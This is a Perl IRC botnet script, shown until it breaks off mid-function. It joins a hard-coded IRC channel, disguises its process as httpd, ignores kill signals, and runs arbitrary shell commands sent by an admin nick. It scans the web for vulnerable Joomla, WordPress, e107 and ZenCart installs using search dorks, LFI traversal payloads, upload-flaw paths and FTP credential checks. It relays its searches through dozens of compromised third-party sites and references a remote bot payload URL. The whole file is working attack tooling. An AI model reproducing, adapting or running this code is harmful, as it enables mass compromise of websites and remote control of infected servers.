#!/usr/bin/perl use HTTP::Request; use HTTP::Request::Common; use HTTP::Request::Common qw(POST); use LWP::Simple; use LWP 5.64; use LWP::UserAgent; use Socket; use IO::Socket; use IO::Socket::INET; use IO::Select; use MIME::Base64; use URI::Escape; use Digest::MD5 qw(md5_hex); my $datetime = localtime; my $number = int(rand(100)); my $fakeproc = "/usr/sbin/httpd"; my $ircserver = "5.135.208.233"; my $ircport = "66661"; my $nickname = "ALB[".$number."]"; my $ident = "Alb"; my $channel = "#kampung"; my $chanxxx = "#kampung"; my $admin = "pico"; my $fullname = "8,1[4!9]4[Alboz]"; my $rawmsg = $ARGV[4]; my $msgraw = $ARGV[5]; my $nob0dy = "9,1[0*1]0[Alb-X-Team]"; my $lfilogo = "9,1[0*9]0Lfi 0<9-0> "; my $xmllogo = "9,1[0*9]0Xml 0<9-0> "; my $e107logo = "9,1[0*9]0E107 0<9-0> "; my $zenlogo = "9,1[0*9]0ZenCart 0<9-0> "; my $jcelogo = "9,1[0*9]0JcE 0<9-0> "; my $rcilogo = "9,1[0*9]0RcI 0<9-0> "; my $ffmlogo = "9,1[0*9]0FFM 0<9-0> "; my $cgmlogo = "9,1[0*9]0CGM 0<9-0> "; my $carilogo = "9,1[0*9]0Find 0<900> "; my $lficmd = "!lfi"; my $xmlcmd = "!xml"; my $e107cmd = "!e107"; my $zencmd = "!zen"; my $jcecmd = "!jce".$number.""; my $rcicmd = "!rci".$number.""; my $ffmcmd = "!ffm".$number.""; my $cgmcmd = "!cgm".$number.""; my $cmdlfi = "!cmdlfi".$number.""; my $cmdxml = "!cmdxml".$number.""; my $ftpcmd = "!ftp"; my $botxx = "http://bitcoinshell.mooo.com/users/pico/oyop.txt"; my $timot = 10; my $silentmode = 1; my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"; my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000"; my $jpath = "?____pgfa=http%253A%252F%252Fwww.google.com%252Fsearch?q="; my $jackae = "http://www.sparenergikramfors.se/images/stories/eror.php".$jpath; my $jackar = "http://glatz-ev.it-syndicate.de/images/stories/eror.php".$jpath; my $jackat = "http://www.parroquiajesusobrerotemuco.com/joomla/images/stories/eror.php".$jpath; my $jackau = "http://www.duemmeambrassi.com/images/banners/eror.php".$jpath; my $jackbr = "http://liga-t.com.ua/images/stories/eror.php".$jpath; my $jackca = "http://www.grsl.com/images/stories/eror.php".$jpath; my $jackcl = "http://lms-lorenskog.no/portal/images/stories/eror.php".$jpath; my $jackcn = "http://www.wickandkeissbc.com/images/stories/eror.php".$jpath; my $jackcom = "http://www.fourwindsnhc.com/cleansingdepot/images/stories/eror.php".$jpath; my $jackcz = "http://www.intergraphics.gr/images/stories/eror.php".$jpath; my $jackde = "http://noc.prodeb.ba.gov.br/images/stories/eror.php".$jpath; my $jackdk = "http://www.curcubeuldeplopis.ro/images/stories/eror.php".$jpath; my $jackes = "http://www.les-mosbach.info/start/images/stories/eror.php".$jpath; my $jackeu = "http://www.gistutor.com/images/stories/eror.php".$jpath; my $jackfr = "http://www.yellowcom.eu/images/stories/eror.php".$jpath; my $jackhu = "http://www.ogrod.tartakmlynowo.pl/images/stories/eror.php".$jpath; my $jackid = "http://www.gytcontinental.com.sv/website/images/stories/eror.php".$jpath; my $jackil = "http://mommy.vn/images/stories/eror.php".$jpath; my $jackin = "http://www.leprevost-art.fr/images/stories/eror.php".$jpath; my $jackinfo = "http://122.154.129.219/sata/images/stories/eror.php".$jpath; my $jackir = "http://www.leboeufsurlaplace.net//images/stories/eror.php".$jpath; my $jackit = "http://www.kainton.com/kdsite/images/stories/eror.php".$jpath; my $jackjp = "http://www.sieradenvoormannen.nl/images/stories/eror.php".$jpath; my $jackkr = "http://www.eriusws.com/stagema/jupgrade//administrator/components/com_jinc/classes/graphics/tmp-upload-images/eror.php".$jpath; my $jackmx = "http://www.giraldezpublicidad.com/images/stories/eror.php".$jpath; my $jackmy = "http://rezekiseafood.com/images/stories/eror.php".$jpath; my $jacknet = "http://www.solucioneslaser.com/images/stories/eror.php".$jpath; my $jacknl = "http://61.93.252.78/home/images/stories/eror.php".$jpath; my $jackorg = "http://www.vilellarahn.com/images/stories/eror.php".$jpath; my $jackph = "http://schelmenkeller.servebeer.com/images/stories/eror.php".$jpath; my $jackpl = "http://pcprmilicz.pl/cms/images/stories/eror.php".$jpath; my $jackro = "http://www.sungoldpicture.com/images/stories/eror.php".$jpath; my $jackru = "http://www.beholders.de/b1/images/stories/eror.php".$jpath; my $jackth = "http://www.infoiarna.org.gt/promudel/images/stories/eror.php".$jpath; my $jackua = "http://www.dibnc.com/images/stories/eror.php".$jpath; my $jackuk = "http://www.vornay.fr/vornay/images/stories/eror.php".$jpath; my $jackus = "http://www.089provisionsfrei.de/images/stories/eror.php".$jpath; my $jacksi = "http://sklep.aptekafrancuska.com.pl/images/stories/eror.php".$jpath; my $jackbe = "http://www.malwasan.de/images/stories/eror.php".$jpath; my $jackbiz = "http://www.ogrod.tartakmlynowo.pl/images/stories/eror.php".$jpath; my $jackby = "http://www.osgdoorsasia.com/images/stories/eror.php".$jpath; my $jackma = "http://frankwurzinger.com/images/stories/eror.php".$jpath; my $jackws = "http://www.purasalsacadiz.com/images/stories/eror.php".$jpath; my $jackba = "http://karadenizinsaat.com.tr/images/stories/eror.php".$jpath; my $jackal = "http://www.centi.pt/newlight/images/stories/eror.php".$jpath; my $jackdo = "http://tim.com.pt/images/stories/eror.php".$jpath; my $jackch = "http://gistutor.com/images/stories/eror.php".$jpath; my $jacklu = "http://www.kcti1450.com/images/stories/eror.php".$jpath; my $jackr1 = "http://www.elektro-uebelacker.de/images/stories/eror.php".$jpath; my $jackr2 = "http://www.gainglobal.org/images/stories/eror.php".$jpath; my $jackr3 = "http://122.154.140.99/sesao33/webplan/images/stories/eror.php".$jpath; my $jackr4 = "http://www.megahmee.com/images/stories/eror.php".$jpath; my $jackr5 = "http://www.remer.org.br/site/images/stories/eror.php".$jpath; my $jackr6 = "http://www.keratsini-drapetsona.gr/images/stories/eror.php".$jpath; my $jackr7 = "http://www.dalee.cz/images/stories/eror.php".$jpath; my $jackr8 = "http://www.parkingpyrzowice-partner.netafilio.pl/images/stories/eror.php".$jpath; my $jackr9 = "http://www.fullthrottlejunkies.org/ftj/images/stories/eror.php".$jpath; my $jackr10 = "http://selsanyapi.com/images/stories/eror.php".$jpath; my $engine = "JacKAE,JacKAR,JacKAT,JacKAU,JacKBR,JacKCA,JacKCL,JacKCN,JacKCOM,JackCZ,JacKDE,JacKDK,JacKES,JacKEU,JacKFR,JacKHU,JacKID,JacKIL,JacKIN,JacKInfO,JacKIR,JacKIT,JacKJP,JacKKR,JacKMX,JacKMY,JacKNET,JacKNL,JacKORG,JacKPH,JacKPL,JacKRO,JacKRU,JacKTH,JacKUA,JacKUK,JacKUS,JacKSI,JacKBE,JacKBIZ,JacKCH,JacKLU,JacKBA,JacKDO,JacKBY,JacKMA,JacKAL,JacKWS,JacKR1,JacKR2,JacKR3,JacKR4,JacKR5,JacKR6,JacKR7,JacKR8,JacKR9,JacKR10,GooGLeCA,GooGLeDE,GooGLeUK,GooGLeFR,GooGLeES,GooGLeIT,GooGLeNL,GooGLeBE,GooGLeCH,GooGLeSE,GooGLeDK,GooGLeNO,GooGLeNZ,GooGLeIE,GooGLeBR,GooGLeAR,GooGLeCO,GooGLeCU,GooGLeCL,GooGLeMX,GooGLeAU,GooGLeRU,GooGLeAT,GooGLePL,GooGLeIL,GooGLeTR,GooGLeUA,GooGLeGR,GooGLeJP,GooGLeCN,GooGLeMY,GooGLeTH,GooGLeIN,GooGLeKR,GooGLeRO,GooGLeTW,GooGLeZA,GooGLePT,GooGLeBY,GooGLeSEY,YahOoCA,YahOoUK,YahOoDE,YahOoFR,YahOoES,YahOoIT,YahOoHK,YahOoID,YahOoIN,YahOoAU,YahOoMX,YahOoTW,YahOoBR,YahOoAR,YahOoNL,YahOoDK,YahOoPH,YahOoCL,YahOoRU,YahOoCH,YahOoCO,YahOoFI,YahOoRO,YahOoVE,YahOoAT,YahOoPL,YahOoKR,YahOoNZ,YahOoGR,YahOoPE,BingDE,BingUK,BingCA,BingBR,BingFR,BingES,BingIT,BingBE,BingNL,BingPT,BingNO,BingDK,BingSE,BingCH,BingNZ,BingRU,BingJP,BingCN,BingKR,BingMX,BingAR,BingCL,BingAU,AsKCA,AsKDE,AsKIT,AsKFR,AsKES,AsKRU,AsKNL,AsKUK,AsKBR,AsKPL,AsKAU,AsKAT,AsKJP,AsKSE,AsKMX,AsKNO,AsKDK"; my @jpaths = ('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart', '/administrator/components/com_acymailing/inc/openflash', '/administrator/components/com_jnewsletter/includes/openflashchart', '/administrator/components/com_jinc/classes/graphics', '/administrator/components/com_maianmedia/utilities/charts', '/administrator/components/com_jnews/includes/openflashchart'); my $jvuln = "/php-ofc-library/ofc_upload_image.php"; my $jshell = "/tmp-upload-images/lobex21.php"; $SIG{'INT'} = 'IGNORE'; $SIG{'HUP'} = 'IGNORE'; $SIG{'TERM'} = 'IGNORE'; $SIG{'CHLD'} = 'IGNORE'; $SIG{'PS'} = 'IGNORE'; #chdir("/"); $ircserver = "$ARGV[0]" if $ARGV[0]; $ircport = "$ARGV[1]" if $ARGV[1]; $nickname = "$ARGV[2]" if $ARGV[2]; $channel = '#'."$ARGV[3]" if $ARGV[3]; $0 = "$fakeproc"."\0" x 16; my $pid = fork; exit if $pid; die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); our %irc_servers; our %DCC; my $dcc_sel = new IO::Select->new(); $sel_client = IO::Select->new(); sub sendraw { if ($#_ == '1') { my $socket = $_[0]; print $socket "$_[1]\n"; } else { print $IRC_cur_socket "$_[0]\n"; } } sub connector { my $mynick = $_[0]; my $ircserver_con = $_[1]; my $ircport_con = $_[2]; my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); if (defined($IRC_socket)) { $IRC_cur_socket = $IRC_socket; $IRC_socket->autoflush(1); $sel_client->add($IRC_socket); $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con"; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; nick("$mynick"); sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); sleep(1);}} sub parse { my $servarg = shift; if ($servarg =~ /^PING \:(.*)/) { sendraw("PONG :$1"); } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { if (lc($1) eq lc($mynick)) { $mynick = $4; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; } } elsif ($servarg =~ m/^\:(.+?)\s+433/i) { nick($mynick.int(rand(5))); } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { $mynick = $2; $irc_servers{$IRC_cur_socket}{'nick'} = $mynick; $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; sendraw("MODE $mynick +Bx"); sendraw("NS id qwe123"); sleep(3); sendraw("JOIN $channel correct"); sendraw("JOIN $chanxxx mejen"); sleep(1); sendraw("PRIVMSG $channel :8,1[4!9]4 + Jce , Rci Scanner - Chegou =D !!!"); sendraw("PRIVMSG $admin :Hi $admin im here !!!"); } } my $line_temp; while( 1 ) { while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); } select(undef, undef, undef, 0.01); delete($irc_servers{''}) if (defined($irc_servers{''})); my @ready = $sel_client->can_read(0); next unless(@ready); foreach $fh (@ready) { $IRC_cur_socket = $fh; $mynick = $irc_servers{$IRC_cur_socket}{'nick'}; $nread = sysread($fh, $ircmsg, 4096); if ($nread == 0) { $sel_client->remove($fh); $fh->close; delete($irc_servers{$fh}); } @lines = split (/\n/, $ircmsg); $ircmsg =~ s/\r\n$//; if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) { my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5); if ($path eq $mynick) { if ($msg =~ /^PING (.*)/) { sendraw("NOTICE $nick :PING $1"); } if ($msg =~ /^VERSION/) { sendraw("NOTICE $nick :VERSION mIRC v6.21 Khaled Mardam-Bey"); } if ($msg =~ /^TIME/) { sendraw("NOTICE $nick :TIME ".$datetime.""); } if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) { sendraw("NICK ".$1); } if (&isAdmin($nick) && $msg =~ /^!pid/) { sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$"); } if (&isAdmin($nick) && $msg !~ /^!/) { &shell("$nick","$msg"); } if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) { sendraw("$rawmsg $msgraw ".$1); } if (&isAdmin($nick) && $msg =~ /^!say (.+)/) { sendraw("PRIVMSG $rawmsg ".$1); } if (&isAdmin($nick) && $msg =~ /^!act (.+)/) { sendraw("PRIVMSG $rawmsg :ACTION ".$1.""); } if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) { $newtimot = $1; $timot = $newtimot; &msg("$admin","8,1 Get Content TimeOut change to4 $timot "); } if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $newchan = $1; $chanxxx = $newchan; &msg("$admin","8,1 xChan change to4 $chanxxx "); }}} } else { if (&isAdmin($nick) && $msg eq "!die") { &shell("$path","kill -9 $$"); } if (&isAdmin($nick) && $msg eq "!killall") { &shell("$path","killall -9 perl"); } if (&isAdmin($nick) && $msg eq "!reset") { sendraw("QUIT :Restarting..."); } if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) { sendraw("JOIN #".$1); } if (&isAdmin($nick) && $msg eq "!part") { sendraw("PART $path"); } if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) { sendraw("PART #".$1); } if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) { &shell("$path","$1"); } if (&isAdmin($nick) && $msg =~ /^!silent\s+(.*) -d/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { $smod = $1; if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; } elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; } &msg("$path","8,1[4!9]Silent Mode4 $silentstat !!!!"); }}} if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){ my $url = $1.$lfdtest; my $cmd = $2; &cmdlfi($url,$cmd,$path); } if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmdxml($url,$cmd,$path); } if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){ my $url = $1; my $cmd = $2; &cmde107($url,$cmd,$path); } ##################################################################### HELP COMMAND if ($msg=~ /^!help/) { my $helplogo = "8,1[4!9]4Help 4<9=4> "; &msg("$path","$helplogo9LFI Vuln Scan:4 $lficmd [bug] [dork] "); &msg("$path","$helplogo9XML Vuln Scan:4 $xmlcmd [bug] [dork] "); &msg("$path","$helplogo9e107 Vuln Scan:4 $e107cmd [dork] "); &msg("$path","$helplogo9ZenCart Vuln Scan:4 $zencmd [dork] "); &msg("$path","$helplogo9Joomla CE Vuln Scan:4 $jcecmd [dork] "); &msg("$path","$helplogo9Joomla Exploit:4 $rcicmd [dork] "); } if (&isAdmin($nick) && $msg =~ /^!pid/) { &msg("$nick","6Fake Process/PID : $fakeproc - $$"); } ##################################################################### SCAN if ($msg =~ /!cari\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $find = $1; &msg($path,"$carilogo9 Searching 4$find "); &cari($path,$find); } exit; } } if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan LFI di 4$path "); &msg("$path","$lfilogo9Dork 4<9=4>4 $dork "); &msg("$path","$lfilogo9Bugz 4<9=4>4 $bug "); &msg("$path","$lfilogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,1); } } } if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ($1,$2); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan XML di 4$path "); &msg("$path","$xmllogo9Dork 4<9=4>4 $dork "); &msg("$path","$xmllogo9Bugz 4<9=4>4 $bug "); &msg("$path","$xmllogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,2); } } } if ($msg =~ /^$e107cmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { if (&isFound($thumbid,"GIF89")) { my ($bug,$dork) = ("contact.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan E107 di 4$path "); &msg("$path","$e107logo9Dork 4<9=4>4 $dork "); &msg("$path","$e107logo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,3); } else { &msg("$path","8,1[4!9]Injector 4<9=4>4 Lost!!! "); } } } } if ($msg =~ /^$zencmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan ZenCart di 4$path "); &msg("$path","$zenlogo9Dork 4<9=4>4 $dork "); &msg("$path","$zenlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,4); } } } if ($msg =~ /^$jcecmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&version=1576&cid=20",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$jcelogo9,1Denied $nick, 0Dork Already Scanned "); exit; } else { &msg("$chanxxx","9,1[0*9]9Lapor 0<9*0> 9$nick 0Start scan JcE di 4$path "); &sendraw("mode $path +m"); &msg("$path","$jcelogo9Dork 4<9=4>4 $dork "); &msg("$path","$jcelogo9Search Engine 0<9*0>9 Loading "); &write_dorks($dork); &se_start($path,$bug,$nick,$dork,$engine,5); } } } } if ($msg =~ /^$ffmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/front-file-manager/upload.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan FFM di 4$path "); &msg("$path","$ffmlogo9Dork 4<9=4>4 $dork "); &msg("$path","$ffmlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,6); } } } if ($msg =~ /^$rcicmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("",$1); my $check = &read_dorks($dork); if ($check == 1) { &msg("$path","$rcilogo9Denied $nick, 4Dork Already Scanned "); exit; } else { &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan RcI di 4$path "); &sendraw("mode $path +m"); &msg("$path","$rcilogo9Dork 4<9=4>4 $dork "); &msg("$path","$rcilogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,7); &write_dorks($dork); } } } } if ($msg =~ /^$cgmcmd\s+(.*)/) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($bug,$dork) = ("wp-content/plugins/complete-gallery-manager/frames/upload-images.php",$1); &msg("$chanxxx","8,1[4!9]4Lapor 4<9=4> 9$nick 4lagi scan CGM di 4$path "); &msg("$path","$cgmlogo9Dork 4<9=4>4 $dork "); &msg("$path","$cgmlogo9Search Engine 4<9=4>4 Loading "); &se_start($path,$bug,$nick,$dork,$engine,8); } } } if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my ($host,$user,$pass) = ($1,$2,$3); &msg("$path","8,1[4!9]FTP 4<9=4>4 Checking $host | $user:$pass"); my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { ¬ice("$nick","4,1 [9FTP4] [ 9http://".$host." 4] [".$user.":".$pass."4] 9Success "); } else { ¬ice("$nick","4,1 [9FTP4] [ 9http://".$host." 4] [".$user.":".$pass."4] 4Denied "); } } } } } } for(my $c=0; $c<= $#lines; $c++) { $line = $lines[$c]; $line = $line_temp.$line if ($line_temp); $line_temp = ''; $line =~ s/\r$//; unless ($c == $#lines) { parse("$line"); } else { if ($#lines == 0) { parse("$line"); } elsif ($lines[$c] =~ /\r$/) { parse("$line"); } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) { parse("$line"); } else { $line_temp = $line; } } } } } ################################################################################## sub lobex() { my $dork = $_[0]; my @targets; for (my $st=0; $st<=1000 ; $st+=100){ my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st; my $browser = &search_engine_query($engine); while ($browser =~ m/ 0) { foreach my $site(@target) { $count++; if ($count == $num-1) { &msg("$chan","$carilogo9Finished 4for 9$dork "); } my $test = "http://".$site.".php?src=".$thumbshell; if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { my $coba = &get_content($test); if ($coba =~ /Unable to open image/) { &msg($chan,"$carilogo9 VulN 4-> 4 http://".$site.".php "); } } exit; } } } } sub type() { my ($chan,$bug,$nick,$dork,$engine,$type) = @_; if ($type == 1){$type=&lfi_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 2){$type=&xml_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 3){$type=&e107_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 4){$type=&zen_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 5){$type=&jce_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 6){$type=&ffm_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 7){$type=&rci_exploit($chan,$bug,$nick,$dork,$engine);} elsif ($type == 8){$type=&cgm_exploit($chan,$bug,$nick,$dork,$engine);} } ################################################################################## sub se_start() { my ($chan,$bug,$nick,$dork,$engine,$type) = @_; if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAE",$type); } exit; } } if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAR",$type); } exit; } } if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAT",$type); } exit; } } if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKAU",$type); } exit; } } if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKBR",$type); } exit; } } if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCA",$type); } exit; } } if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCL",$type); } exit; } } if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCN",$type); } exit; } } if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCoM",$type); } exit; } } if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKCZ",$type); } exit; } } if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDE",$type); } exit; } } if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKDK",$type); } exit; } } if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKES",$type); } exit; } } if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKEU",$type); } exit; } } if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKFR",$type); } exit; } } if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKHU",$type); } exit; } } if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKID",$type); } exit; } } if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIL",$type); } exit; } } if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIN",$type); } exit; } } if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKInfO",$type); } exit; } } if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIR",$type); } exit; } } if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKIT",$type); } exit; } } if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKJP",$type); } exit; } } if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKKR",$type); } exit; } } if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMX",$type); } exit; } } if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKMY",$type); } exit; } } if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKNeT",$type); } exit; } } if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKNL",$type); } exit; } } if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKOrG",$type); } exit; } } if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKPH",$type); } exit; } } if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKPL",$type); } exit; } } if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKRO",$type); } exit; } } if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKRU",$type); } exit; } } if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKTH",$type); } exit; } } if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$nick,$dork,"JacKUA",$type); } exit; } } if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { 